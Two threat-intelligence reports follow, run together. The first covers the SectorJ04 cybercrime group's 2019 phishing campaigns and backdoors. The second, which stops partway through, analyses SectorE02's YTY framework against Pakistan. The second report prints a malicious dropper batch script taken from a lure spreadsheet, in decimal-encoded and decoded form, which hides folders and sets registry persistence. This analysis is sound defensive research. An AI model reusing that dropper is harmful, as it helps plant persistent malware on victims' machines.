SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server.

Main countries and sectors targeted

The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe, or general companies such as retail and manufacturing, but they recently expanded their areas of activity to include the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place much restrictions on the sectors targeted. The following are the sectors and countries under which SectorJ04 group was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria, Bangladesh

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as a universities
  • Manufacturing companies such as manufactures of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • A job-seeking company
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached, and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system. As anti-virus programs have recently begun to detect MSI files, in some instances macro scripts contained in the malicious documents would install backdoors directly onto infected systems without using MSI files.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

Malicious documents used for hacking are mainly written as themes related to MS Office, and the same themes are often used several times, with only language changes depending on the victim’s language.

In addition, the MSI files backdoor used by SectorJ04 mostly had valid digital signatures, and most of their malware were signed just days before they were found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoor, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Backdoors are installed in infected systems and they also distributed email stealers, botnet malware and ransomware through those backdoors.

They were recently confirmed to use additional backdoor called AdroMut and FlowerPippi, which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file, or to collect system information and send it to the attacker’s server.

Malware Types Found Before 2019

ServHelperFlawedAmmy RATRMS RAT
Initial Infection MethodAn MSI file that is downloaded from a document file attached to a spear phishing email.
Downloaded by MSINullsoft InstallerEncoded FlawedAmmy RATSFX File
CharacteristicC2 response has certain separatorCheck for Antivirus
Register AutoPlay with “wsus.exe”
Utilize configuration files in DAT formats

Malware Types Found After 2019

AdroMutFlowerPippi
Initial Infection MethodDocument files attached to the spear phishing emails
CharacteristicsInternal-used strings are decoded into AES-256-ECB mode after base64 decode.
Configure infection system information in JSON format (encrypted)
Load into “ComputerDefaults.exe” using DLL side loading technique
A simpler function than hard-coded RC4 key AdroMut

Backdoor installed in the infected system distributed additional botnet malware, ransomware and email stealers. The email stealer collects connection protocol information and account information, such as SMTP, IMAP, and POP3, which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

An email stealer may also have a file collection function to collect email information that is recorded in the metadata of the file corresponding to the hard-coded extension. In addition, the malware eventually creates and executes a batch file for self-delete, removing the execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect email accounts stored in infection systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • Changes in targets of hacking from specific organizations and industry groups to large number of irregular ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

The changes could also be seen in attachments to spam emails used by attackers. Existing spam emails used attachments in the form of malicious documents, but attachments with HTM and HTML extensions were also found and the text included links to download malicious documents directly.

The SectorJ04 group’s initial spam emails had no mail content or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware, such as Locky and GlobeImporter, along with its banking Trojan, on its victims computers. But after 2019 the group has changed its hacking strategy to attack using spam email. In particular, a number of remote control malware are utilized to gain access to resources such as email accounts and system login information from the infected machine to send more spam emails and distribute their malware.

Increased hacking activities targeting East and Southeast Asia

The hacking activities of SectorJ04 group, which targeted South Korea in the first half of 2019, have been continuously discovered. The emails found were written in relation to invoice and tax accounting data, and were attached the MS Word or Excel files with malicious macros inserted. Malicious documents written in Korean have the same characteristics as other language hacking activities under the theme of MS Office.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no content, but the latest ones use elaborated spam emails for hacking, such as using images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the hacking method of the SectorJ04 group. In addition to their preexist backdoor, ServHelper and FlawedAmmy, they have also been confirmed to use the backdoor called AdroMut and FlowerPippi.

AdroMut downloads the malware (ServHelper and FlawedAmmy RAT) used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor.

FlowerPippi collects infection system information, such as the domain of the infected system, proxy settings, administrator rights, and OS version, and performs functions such as executing commands received, downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 RC4 key with hard-coded view from the FlowerPippi back door

The SectorJ04 group is believed to have developed and used malware that functions as a downloader for the purpose of installing or downloading malware to replace the MSI installation files that they have used for hacking for more than six months as the detection rate of security solutions increased.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which has been utilizing the same pattern of infection and the same malware for more than six months, is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files, changing their spam email format and using new types of backdoor.

Changes in hacking targets from specific organizations and industries to random ones

Until 2019, SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit, and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019.

This allows them to expand their range of targets of hacking activities for financial profit, and in this regard, SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019.

They eventually hacked the Active Directory (AD) server and took control of the entire corporate internal network, and then distributed the Clop ransomware on the AD server. From the hacking activity, we also found malware for collecting email information and “AmadeyBot”, a botnet malware that which has its source code available in Russia’s underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into companies in South Korea to distribute Clop ransomware. Attackers used spam emails disguised as being sent by the National Tax Service in May to install FlawedAmmy RAT in the infected system, during which the Clop ransomware was found using the same certificate as the FlawedAmmy RAT executable file.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor infections that are installed from malicious documents identified in the SectorJ04 group-related hacking cases that occurred during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used the spear phishing email to spread malicious Excel or malicious Word files, and downloaded the MSI files from the attacker’s server when the malicious documents were run.

The MSI file installs a downloader that downloads FlawedAmmy RAT encoded in the infection system from the attacker server, and the downloaded FlawedAmmy RAT registers an automatic execution under the name “wsus.exe.”

Figure 21 Type of backdoor installation to install encoded executable file Type 1

FlawedAmmy RAT performs remote control functions in the infected system and decodes encoded executable files downloaded from the attacker server using certain hard-coded strings. It also has a function to check if a particular process is running to determine whether their malware should be executed.

Figure 22 “Ammy Admin” string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019. Malicious documents delivered through the spear phishing email downloaded the MSI file, which forwards the NSIS Installer to the infected system. The NSIS script executes the final payload, ServHelper, in the DLL file format, using “rundll32.exe”.

Note that NSIS (Nullsoft Scriptable Install System) is a script-based installation system for Windows and is a lightweight installation system supported by Nullsoft.

Figure 24 Backdoor installation type utilizing NSIS Installer Type 2

Decompressing the NSIS installer installed by the MSI file shows that it consists of an NSIS script with an NSI extension, a ServHelper in the DLL file format, and a “ncExec.dll,” the normal DLL required to run the NSIS.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper performs the function of the backdoor in the infection system and sends specific types of responses to C2 servers using delimiters such as “key,” “sysid,” and “resp”. Different types of delimiters are sometimes found depending on malware.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019. Malicious documents delivered through the spear phishing email pass MSI files to the infection system, and MSI files download the executable self-extracting file (SFX). When the SFX file is executed, another SFX file inside is executed and the final payload, RMS RAT, is delivered to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files Type 3

Within the first SFX file to be downloaded by the MSI file, there are four files. When executing an SFX file, it uses a command to change the extension of the SFX file (“kernel.dll”) of the DLL extension to EXE and decompress it using a hard-coded password. The files that make up the SFX file vary from malware to malware.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

Four files can be seen in the second SFX file that has been decompressed, and as before, running “exit.exe”. “exit.exe” executes the same “i.cmd” as before, which executes an RMS RAT with the file name “winserv.exe” in the registry. RMS RAT is a legitimate remote management software created in Russia, and files with DAT extensions contain configuration information to run the RMS RAT.

Figure 31 Configuring a second SFX file disguised as a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following is about the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education, job openings, real estate and semiconductors in South Korea. Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as those sent by large South Korean airlines and used ISO-format files as attachments. The group used the same body contents of the email to deliver spam emails to multiple hacking targets.

Decompressing the ISO file attached to the spam email would show an SCR file disguised as a “.pdf” extension exists, which is a .NET executable file that downloads an MSI file. The ISO files sometimes contain LNK files, which, like the malware written in .NET, download an MSI files from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file

The following valid digital signatures were found in the MSI file downloaded from the attacker server. Other digital signatures were also found issued by “HAB CLUB LT” and “LUK 4 TRANSPORT LT”.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server and the activity uses a Base64 encoded Powershell script to determine if the infected system is a PC contained in an Active Directory Domain.

Figure 38 Powershell script to determine if a PC belongs to a domain

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting the users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare-wage management, as well as energy-related companies such as gas and wind power. Also, they continued their attacks on preexisting hacking target areas such as manufacturing, distribution and retail.

The contents of the text written in French and English were found in the spam email, and an MS Word file with random numbers was used as an attachment. All emails found in the hacking activity had the same text content.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in the hacking activity, indicating that the contents of the text of the email used in the hacking activity were reused in June. Attached file is an MS Word file titled “스캔_(random number).doc”.

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word file used as an attachment is disguised as an order confirmation and a goods receipt. Running the macro from the document would allow the downloader with the DLL file format to run using “rundll32.exe”. The downloader downloads FlawedAmmy RAT from the attacker server and runs under the name “rundl32.exe”.

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korea language users disguised as a receipt of goods
Figure 43 Part of the macro script included in the malicious document

FlawedAmmy RAT found in the hacking activity showed the existing “Ammyy Admin” string being modified to “Popss Admin” and created Mutex with “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Change hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the above mentioned changes in the FlawedAmmy RAT found in the most recent hacking activity, other changes such as changes in their string decoding were identified.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborated attacks while at the same time targeting indiscriminately. They are one of the most active cyber crime groups in 2019, and they often modify and tweak their hacking methods and perform periodic hacking activities.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the attack activity against the group.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Intent

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group going on against the Government of Pakistan and organizations there related to defense and intelligence. Spear phishing emails are sent to their victims via Excel XLS files, which asks their victims to enable macros which will end up executing the downloader. Malicious document lures they have employed in recent times include a document purporting to be for registration for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and mobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

At the back, the excel macro would retrieve encoded data stored in itself, and the encoding here is just a simple decimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a zip archive containing two files – a batch script and executable which is then unzipped and executed.

All four files here are illustration copied files from the original “.txt”, “.pdf”, and “.inp” files which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator
101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,34,13,10,83,69,84,32,47,65,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,32,13,10,83,69,84,32,47,65,32,82,65,78,68,61,37,82,65,78,68,79,77,37,32,49,48,48,48,48,32,43,32,49,32,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,119,105,110,46,116,120,116,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,119,105,110,46,116,120,116,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,102,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,115,118,99,104,111,116,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,85,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,112,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,107,121,108,103,114,46,101,120,101,13,10,109,111,118,101,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,65,112,112,68,97,116,97,92,106,117,99,104,101,107,46,116,116,112,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,114,101,110,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,116,116,112,32,106,117,99,104,101,107,46,101,120,101,13,10,100,101,108,32,37,48

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required for the executable downloader.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
/echo off rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools rd /s /q %USERPROFILE%\Print\Network\Server rd /s /q %USERPROFILE%\DriveData\Files rd /s /q %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Printers\Neighbourhood\Spools md %USERPROFILE%\DriveData\Files md %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Print\Network\Server attrib +a +h +s “%USERPROFILE%\DriveData” attrib +a +h +s “%USERPROFILE%\Printers” attrib +a +h +s “%USERPROFILE%\Print” SET /A %COMPUTERNAME% SET /A RAND=%RANDOM% 10000 + 1 echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /f reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe del %0

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs a HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader malware accepts three commands from the server, when the Content-Type response is “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk or executing files/commands on the system. This is how the next stage downloader or plugins can be executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64 and reverse string algorithm multiple (in this case, three) times.

